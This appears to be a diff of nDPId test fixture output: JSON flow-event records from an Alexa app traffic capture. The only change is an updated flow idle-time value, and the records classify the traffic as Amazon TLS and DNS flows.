-00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":49,"flow_first_seen":1490976088631,"flow_last_seen":1490976098828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":18884,"flow_avg_l4_payload_len":385,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":33,"flow_first_seen":1490976088937,"flow_last_seen":1490976110046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12258,"flow_avg_l4_payload_len":371,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":42,"flow_first_seen":1490976088958,"flow_last_seen":1490976094931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12771,"flow_avg_l4_payload_len":304,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1490976089227,"flow_last_seen":1490976107676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8016,"flow_avg_l4_payload_len":296,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1490976089239,"flow_last_seen":1490976111839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10466,"flow_avg_l4_payload_len":360,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976114885,"flow_last_seen":1490976117017,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4039,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976114894,"flow_last_seen":1490976116921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2723,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976114906,"flow_last_seen":1490976117017,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4615,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976114921,"flow_last_seen":1490976117016,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2611,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1490976114940,"flow_last_seen":1490976120960,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5531,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976030894,"flow_last_seen":1490976194743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13865,"flow_avg_l4_payload_len":478,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976150029,"flow_last_seen":1490976164211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":698,"flow_tot_l4_payload_len":2962,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1490976158680,"flow_last_seen":1490976164214,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2813,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1490976195529,"flow_last_seen":1490976198776,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":34748,"flow_avg_l4_payload_len":534,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":56,"flow_first_seen":1490976085644,"flow_last_seen":1490976098828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":21353,"flow_avg_l4_payload_len":381,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976085829,"flow_last_seen":1490976088478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4344,"flow_avg_l4_payload_len":188,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976085832,"flow_last_seen":1490976088478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2595,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976085884,"flow_last_seen":1490976088478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45707,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976085884,"flow_last_seen":1490976088478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45707,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976088605,"flow_last_seen":1490976094930,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":698,"flow_tot_l4_payload_len":1938,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":49,"flow_first_seen":1490976088631,"flow_last_seen":1490976098828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":18884,"flow_avg_l4_payload_len":385,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":33,"flow_first_seen":1490976088937,"flow_last_seen":1490976110046,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12258,"flow_avg_l4_payload_len":371,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":42,"flow_first_seen":1490976088958,"flow_last_seen":1490976094931,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12771,"flow_avg_l4_payload_len":304,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1490976089227,"flow_last_seen":1490976107676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8016,"flow_avg_l4_payload_len":296,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1490976089239,"flow_last_seen":1490976111839,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10466,"flow_avg_l4_payload_len":360,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976114885,"flow_last_seen":1490976117017,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4039,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976114894,"flow_last_seen":1490976116921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2723,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976114906,"flow_last_seen":1490976117017,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4615,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976114921,"flow_last_seen":1490976117016,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2611,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1490976114940,"flow_last_seen":1490976120960,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5531,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976030894,"flow_last_seen":1490976194743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13865,"flow_avg_l4_payload_len":478,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976150029,"flow_last_seen":1490976164211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":698,"flow_tot_l4_payload_len":2962,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1490976158680,"flow_last_seen":1490976164214,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2813,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976114879,"flow_last_seen":1490976114880,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 
-00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1490976169531,"flow_last_seen":1490976175920,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2883,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1490976169531,"flow_last_seen":1490976175920,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2883,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976186818,"flow_last_seen":1490976186879,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976071312,"flow_last_seen":1490976071389,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976195921,"flow_last_seen":1490976195980,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976187242,"flow_last_seen":1490976187508,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} -00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976029756,"flow_last_seen":1490976171313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5024,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976165062,"flow_last_seen":1490976175921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1290,"flow_tot_l4_payload_len":3345,"flow_avg_l4_payload_len":176,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976029756,"flow_last_seen":1490976171313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5024,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976165062,"flow_last_seen":1490976175921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1290,"flow_tot_l4_payload_len":3345,"flow_avg_l4_payload_len":176,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
